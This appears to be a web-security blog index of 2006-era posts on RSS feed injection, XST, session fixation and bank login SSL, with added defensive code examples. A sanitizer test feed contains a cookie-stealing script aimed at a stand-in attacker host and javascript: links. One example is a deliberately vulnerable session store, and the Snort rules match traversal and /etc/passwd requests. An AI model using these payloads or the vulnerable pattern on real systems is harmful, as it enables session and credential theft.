  • Microsoft Team RSS Blog discusses more RSS Risks

    The Microsoft guys have written a blog entry about my Black Hat talk and whitepaper. "We designed and implemented the RSS features using the principles of the Secure Development Lifecycle as embraced by Microsoft. One of the principles is defense in depth. The idea being, even if script somehow were to sneak by the first layer of defense,…

  • Feed Injection in Web 2.0: Hacking RSS and Atom Feed Implementations

    This is a copy of the slides I used for my Black Hat 2006 talk and a link to the accompanying paper. Zero Day Subscriptions: Using RSS and Atom Feeds As Attack Delivery Systems (PowerPoint) Feed Injection in Web 2.0: Hacking RSS and Atom Feed Implementations (Remote Copy)

  • RSS and Atom Security risks whitepaper is out!

    I started researching RSS and Atom feed vulnerabilities last September but got distracted for six months or so by work and life. I've written a basic paper discussing the issues relating to cross-site scripting and web-based feeds. I cover the risks associated with the following types of readers: * Web-based readers (such as Bloglines)…
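The core problem the paper describes is a reader that takes the HTML in a feed item and renders it as-is, so a script, event handler or javascript: link injected into any feed the user subscribes to runs in the reader's context. The following is an added example (not code from the paper or from any reader it covers): a whitelist sanitizer for item bodies, run over a constructed RSS 2.0 document that contains one benign and one hostile item. The tag and attribute whitelist is an assumption for the example; a real reader would tune it.

```python
from html import escape
from html.parser import HTMLParser
import xml.etree.ElementTree as ET

# Whitelist used by the sanitizer (an assumption for this example; pick your own).
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://")   # javascript:, data:, vbscript: never pass
VOID_TAGS = {"br"}


class FeedHtmlSanitizer(HTMLParser):
    """Re-serialise an HTML fragment keeping only whitelisted tags/attributes.

    Everything else (script/style blocks and their contents, event-handler
    attributes, unknown tags, non-http(s) hrefs) is dropped; text is escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0   # > 0 while inside <script>/<style>: their text is dropped too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
            return
        if self._skip or tag not in ALLOWED_TAGS:
            return   # unknown tag: drop the tag itself, keep its (escaped) text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()) or value is None:
                continue   # on* handlers, style=, class= ... all dropped
            value = value.strip()
            if name == "href" and not value.lower().startswith(SAFE_SCHEMES):
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = max(self._skip - 1, 0)
        elif not self._skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))

    def result(self):
        return "".join(self.out)


def sanitize_html(fragment):
    p = FeedHtmlSanitizer()
    p.feed(fragment)
    p.close()
    return p.result()


def sanitize_rss_items(rss_xml):
    """Return [(title, description)] for every <item> of an RSS 2.0 document,
    with the title escaped as plain text and the description sanitised as HTML."""
    root = ET.fromstring(rss_xml)
    return [(escape(item.findtext("title", default="")),
             sanitize_html(item.findtext("description", default="")))
            for item in root.iter("item")]


# Constructed sample feed (not a real feed): one benign item, one hostile one.
SAMPLE_RSS = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>demo</title>
<item><title>Benign &lt;b&gt;title&lt;/b&gt;</title>
<description><![CDATA[<p>Hello <b>world</b> <a href="http://example.com/">link</a></p>]]></description></item>
<item><title>Injected</title>
<description><![CDATA[<p onmouseover="alert(1)">x<script>document.location='http://attacker.invalid/'+document.cookie</script></p>
<a href="javascript:alert(document.cookie)">click</a><img src=x onerror=alert(1)>]]></description></item>
</channel></rss>"""

if __name__ == "__main__":
    for title, body in sanitize_rss_items(SAMPLE_RSS):
        print(title, "=>", body)
```

The hostile item comes out as `<p>x</p>` followed by a bare `<a>click</a>`: the script block and its contents, the onmouseover handler, the javascript: href and the img/onerror are all gone, while the benign item is passed through unchanged. The stdlib parser is used here to keep the example self-contained; for a production reader use a maintained sanitizer library, since browsers accept far more malformed markup than `html.parser` normalises.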

  • Forging HTTP request headers with Flash

    Amit Klein has written another fine paper involving using Flash to send http requests. "Flash player is a very popular browser add-on from Adobe (actually, Flash was invented by Macromedia, which was acquired by Adobe). This write-up covers mostly Flash 7 and Flash 8, together covering more than 94% of the Internet-enabled desktops (according to…

  • Using google to find software vulnerabilities

    "Bugle is a collection of search queries which can help to identify software security bugs in source code available on the web. The list at the moment is rather small (you get the idea though), hopefully people will start sending more queries. Source code review is not a straightforward operation, using the list…

  • Zero Day Subscriptions: Using RSS and Atom feeds As Attack Delivery Systems

    I will be giving a talk at Black Hat this year entitled "Zero Day Subscriptions: Using RSS and Atom feeds As Attack Delivery Systems". I'll also be available at the 'Web Application Security Consortium' meet-up for those who want to chat. This presentation will discuss the use of RSS and Atom feeds as a method of delivering…

  • Browser Fun Security Blog

    "This blog will serve as a dumping ground for browser-based security research and vulnerability disclosure. To kick off this blog, we are announcing the Month of Browser Bugs (MoBB), where we will publish a new browser hack, every day, for the entire month of July. The hacks we publish are carefully chosen to demonstrate a…

  • Keystroke Logging Javascript

    "A full disclosure post today had an exploit that used javascript in browsers to selectively "steal" keystrokes from the user typing and channeling it into the file upload field." – ISC Article Link: http://isc.sans.org/diary.php?storyid=1386

  • Not All Banks Requiring SSL

    According to a news entry on DShield, some banks aren't requiring SSL, and even worse, aren't submitting credentials over SSL. The findings can be found below. Research Finding Link: https://www.securewebbank.com/loginssluse.html
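There are two separate things to check on a login page, and the finding above mixes both: whether the page that holds the form came over SSL (if not, the form and its action can be rewritten in transit), and whether the form's action resolves to an https URL (if not, the password itself crosses the wire in the clear). The following is an added example, not code from the DShield entry or the linked research: it pulls every form with a password field out of a page, resolves the action against the page URL, and classifies the result. The three sample pages and their hostnames are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect {"action", "password"} for every <form> on a page."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)   # attribute names arrive lower-cased; values as written
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None

    def close(self):
        super().close()
        if self._current is not None:   # unterminated <form>: report it anyway
            self.forms.append(self._current)
            self._current = None


def audit_login_forms(page_url, html):
    """One finding per form that carries a password field.

    page_https   - the page holding the form came over TLS (otherwise the form,
                   and its action, can be rewritten in transit)
    submit_https - the resolved action URL is https, so the credentials go over TLS
    """
    p = _FormCollector()
    p.feed(html)
    p.close()
    page_https = urlsplit(page_url).scheme == "https"
    findings = []
    for form in p.forms:
        if not form["password"]:
            continue
        action = urljoin(page_url, form["action"])   # "" = post back to this page
        findings.append({"action": action,
                         "page_https": page_https,
                         "submit_https": urlsplit(action).scheme == "https"})
    return findings


def classify(finding):
    if not finding["submit_https"]:
        return "CREDENTIALS_IN_CLEAR"      # password crosses the wire unencrypted
    if not finding["page_https"]:
        return "FORM_SERVED_OVER_HTTP"     # encrypted submit, but the form is spoofable
    return "OK"


# Constructed sample pages; the hostnames are placeholders, not real banks.
PAGE_A_URL = "http://bank-a.example/"
PAGE_A = """<html><body>
<form method="post" action="https://secure.bank-a.example/login">
 User <input name="u"> Pass <input type="password" name="p"> <input type="submit">
</form></body></html>"""

PAGE_B_URL = "http://bank-b.example/login.asp"
PAGE_B = """<form method="post" action="login.asp">
<input name="acct"><input type="PASSWORD" name="pin"></form>"""

PAGE_C_URL = "https://bank-c.example/"
PAGE_C = """<form action="/signon" method="post"><input type="password" name="pw"></form>
<form action="/search"><input name="q"></form>"""

if __name__ == "__main__":
    for url, html in ((PAGE_A_URL, PAGE_A), (PAGE_B_URL, PAGE_B), (PAGE_C_URL, PAGE_C)):
        for f in audit_login_forms(url, html):
            print(url, "->", f["action"], classify(f))
```

Page A is the common "encrypted submit from a cleartext page" pattern: the password goes over TLS, but anyone who can tamper with the HTTP response can point the form elsewhere first. Page B posts the password back to the same cleartext URL. Only page C passes both checks. The checker works on static markup only; a form whose action is set by script needs the page rendered first.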

  • Misunderstanding Javascript injection: A paper on web application abuse via Javascript injection

    UPDATED: 1/30/06 Response from Author "Just to inform you that the malicious code mentioned to you was actually partly research for the paper. If you take a look at the latest version (with lynx if you like), I now refer to the clipboard issue in issue 3 (this was introduced in 1.2.0 of my paper.…

  • XST Strikes Back (or perhaps “Return from the Proxy”…)

    Amit Klein has written a new article entitled "XST Strikes Back (or perhaps 'Return from the Proxy'…)". Whatever the final title may be, it outlines how XST vulnerabilities can still exist when a proxy server sits in front of the server an attacker wants to attack. "About three years ago,…
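The practical consequence of the article is that disabling TRACE on the origin server is not enough: you have to test what actually answers from the client's side of any proxy. The following is an added example, not Amit Klein's code or anything from the article. It builds a TRACE probe carrying a marker header (the `X-XST-Probe` name is made up for the example), and classifies a raw response by whether the marker came back in the body, which is the property cross-site tracing relies on (a Cookie or Authorization header would be echoed the same way). The two responses used offline are constructed; `probe()` sends the same request over a plain socket if you want to run it against a real target.

```python
import socket

MARKER = "X-XST-Probe: cgisec-1"   # hypothetical header; any unique string works


def build_trace_request(host, path="/", marker=MARKER):
    """Minimal HTTP/1.1 TRACE request with a marker header. Whatever answers by
    echoing the request verbatim would echo Cookie/Authorization headers the
    same way, which is all XST needs."""
    return ("TRACE %s HTTP/1.1\r\nHost: %s\r\n%s\r\nConnection: close\r\n\r\n"
            % (path, host, marker)).encode("ascii")


def parse_response(raw):
    """Split a raw HTTP response into (status, {header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(None, 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body.decode("iso-8859-1", "replace")


def analyze_trace_response(raw, marker=MARKER):
    """Decide whether something in the request path echoed our TRACE.

    A 'Via' header (RFC 2616 section 14.45) names intermediaries that handled
    the message; it tells you a proxy was in the path, which is the case the
    article is about: the origin may refuse TRACE while the proxy still answers it."""
    status, headers, body = parse_response(raw)
    echoed = marker in body
    return {
        "status": status,
        "trace_echoed": status == 200 and echoed,
        "content_type": headers.get("content-type", ""),
        "via": headers.get("via"),
        "server": headers.get("server"),
    }


def probe(host, port=80, path="/", timeout=5.0):
    """Send the probe over a plain socket (not used by the offline samples below)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_trace_request(host, path))
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return analyze_trace_response(b"".join(chunks))


# Constructed responses (no real hosts): an origin refusing TRACE, and an
# intermediary that answers it and echoes the whole request, cookie included.
RESP_ORIGIN_REFUSES = (b"HTTP/1.1 405 Method Not Allowed\r\nServer: Apache\r\n"
                       b"Allow: GET, HEAD, POST\r\nContent-Length: 0\r\n\r\n")
RESP_PROXY_ECHOES = (b"HTTP/1.1 200 OK\r\nVia: 1.1 proxy.example\r\n"
                     b"Content-Type: message/http\r\n\r\n"
                     b"TRACE / HTTP/1.1\r\nHost: www.example\r\n"
                     b"X-XST-Probe: cgisec-1\r\nCookie: session=abc123\r\n"
                     b"Connection: close\r\n\r\n")

if __name__ == "__main__":
    print(analyze_trace_response(RESP_ORIGIN_REFUSES))
    print(analyze_trace_response(RESP_PROXY_ECHOES))
```

Run the probe from the same network position a browser would use (through the corporate or ISP proxy), not from the server's own subnet, or you are testing the wrong hop. Note that browsers have refused to issue TRACE from script (XMLHttpRequest) since the original XST disclosure, so the echo on its own is a finding about the server path, not a ready-made browser exploit.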

  • Uninformed Online Zine #3 Released

    An online zine called 'uninformed' has just released issue #3. I gotta say it's worth checking out. Below is the table of contents. * Bypassing PatchGuard on Windows x64 * Windows Kernel-mode Payload Fundamentals * Analyzing Common Binary Parser Mistakes * Attacking NTLM with Precomputed Hashtables * Linux Improvised Userland Scheduler Virus…

  • Application Security Predictions For The Year 2006

    In 2005 published application security vulnerabilities have exploded. If you're subscribed to mailing lists such as bugtraq you know just how often Cross Site Scripting, SQL Injection, or Remote Command Execution vulnerabilities are discovered and exploited. I've prepared a prediction outline for the year 2006 exclusively covering the threats that the web brings. Worms and…

  • PAPER: Preventing Http Session Fixation Attacks

    Zinho Writes "I've published the final research about Http Session Fixation covering the most known attacks and how to prevent them. The paper is written from a web developer point of view and shows various techniques to be safe from fixation and hijacking." Paper Link: Preventing Http Session Fixation Attacks (Paper)
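Session fixation works because a server adopts whatever session ID the client presents and then keeps that ID across login, so an attacker who plants an ID in the victim's browser beforehand owns the authenticated session afterwards. The two defences a developer controls are: never adopt an ID the server did not issue, and rotate the ID whenever the privilege level changes. The following is an added example, not code from Zinho's paper: a minimal server-side session store implementing both rules, a deliberately naive store showing the vulnerable pattern, and the attack run against each.

```python
import secrets
import time


class SessionStore:
    """Server-side session table implementing the two anti-fixation rules:
    1. never adopt a session ID the server did not itself issue;
    2. issue a brand-new ID whenever the session's privilege level changes."""

    def __init__(self, idle_timeout=900, clock=time.time):
        self._sessions = {}          # sid -> {"user": str|None, "last": float}
        self._timeout = idle_timeout
        self._clock = clock          # injectable for testing expiry

    def _new_id(self):
        return secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG

    def _valid(self, sid):
        s = self._sessions.get(sid)
        if s is None:
            return False
        if self._clock() - s["last"] > self._timeout:
            del self._sessions[sid]        # expired: forget it
            return False
        return True

    def resolve(self, cookie_sid):
        """Map the ID from the Cookie header to a server session. Unknown or
        expired IDs (including one an attacker planted) are discarded and
        replaced; the caller must Set-Cookie the returned ID."""
        if cookie_sid is not None and self._valid(cookie_sid):
            self._sessions[cookie_sid]["last"] = self._clock()
            return cookie_sid
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "last": self._clock()}
        return sid

    def login(self, sid, user):
        """On successful authentication: retire the old ID and issue a new one."""
        if not self._valid(sid):
            raise KeyError("unknown session")
        self._sessions.pop(sid)
        new_sid = self._new_id()
        self._sessions[new_sid] = {"user": user, "last": self._clock()}
        return new_sid

    def user_for(self, sid):
        return self._sessions[sid]["user"] if self._valid(sid) else None

    def logout(self, sid):
        self._sessions.pop(sid, None)


class NaiveStore(SessionStore):
    """The vulnerable pattern: adopts any ID the client presents and keeps
    the same ID across login. Shown only to demonstrate the attack."""

    def resolve(self, cookie_sid):
        if cookie_sid is None:
            cookie_sid = self._new_id()
        self._sessions.setdefault(cookie_sid, {"user": None, "last": self._clock()})
        self._sessions[cookie_sid]["last"] = self._clock()
        return cookie_sid

    def login(self, sid, user):
        self._sessions[sid]["user"] = user
        return sid


def fixation_attack(store):
    """Attacker plants a known ID in the victim's browser (link carrying the ID,
    cookie set from a sibling host, XSS, ...); the victim logs in with it; the
    attacker then presents the same ID. Returns the user the attacker obtains."""
    planted = "attacker-chosen-id"
    victim_sid = store.resolve(planted)            # victim's first request carries it
    store.login(victim_sid, "alice")               # victim authenticates
    return store.user_for(planted)                 # attacker replays the planted ID


if __name__ == "__main__":
    print("naive store, attacker gets:", fixation_attack(NaiveStore()))
    print("hardened store, attacker gets:", fixation_attack(SessionStore()))
```

Two things the store does not cover but the same paper's advice implies: take the ID only from the cookie (never from a query string or path, which is the easiest planting channel), and mark the cookie HttpOnly and, on SSL sites, Secure, so the ID cannot be read or replayed from outside the authenticated channel.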

  • “The Anatomy of Cross Site Scripting” Paper released

    libox.net has released a cross site scripting paper which provides examples of bad php code, and also talks a little bit about automating an attack. Additional papers on XSS can be found in our Cross Site Scripting section. “Cross site scripting (XSS) flaws are a relatively common issue in web application security, but they are…

  • Cgisecurity.com IDS rules used in Snort 1.8.2

    I recently wrote some IDS rule sets for Snort that I found useful for detecting known and unknown port 80 attacks. I submitted these rules to snort.org and they liked them so much that they are now included in the newest release. These rules were based on cgisecurity.com's paper #3, which will be released later today. A copy of these new…
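The distinction drawn above, rules for known attacks versus rules for unknown ones, maps onto two kinds of Snort signature: one that matches a specific vulnerable CGI by name, and one that matches the technique (a traversal sequence, a sensitive file name) regardless of which script is targeted. The rules below are an added illustration in Snort 1.x syntax, not the cgisecurity.com rules that shipped in 1.8.2; the message strings and the SIDs (chosen from the range at or above 1000000 that is reserved for local rules) are the example's own.

```snort
# "known" attack: a specific vulnerable CGI being requested by name
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"WEB-CGI phf access attempt"; uricontent:"/cgi-bin/phf"; nocase; sid:1000001; rev:1;)

# "unknown" attack: the technique, not the target - directory traversal in the URI
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"WEB-ATTACK directory traversal in URI"; uricontent:"../"; sid:1000002; rev:1;)

# "unknown" attack: what the traversal usually aims at, anywhere in the request
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"WEB-ATTACK /etc/passwd in request"; content:"/etc/passwd"; nocase; sid:1000003; rev:1;)
```

The technique-based rules are the ones that catch tomorrow's CGI bug, but they also fire on legitimate traffic that happens to contain the pattern (relative links, file names in POST bodies), so expect to tune them per site rather than deploy them blind.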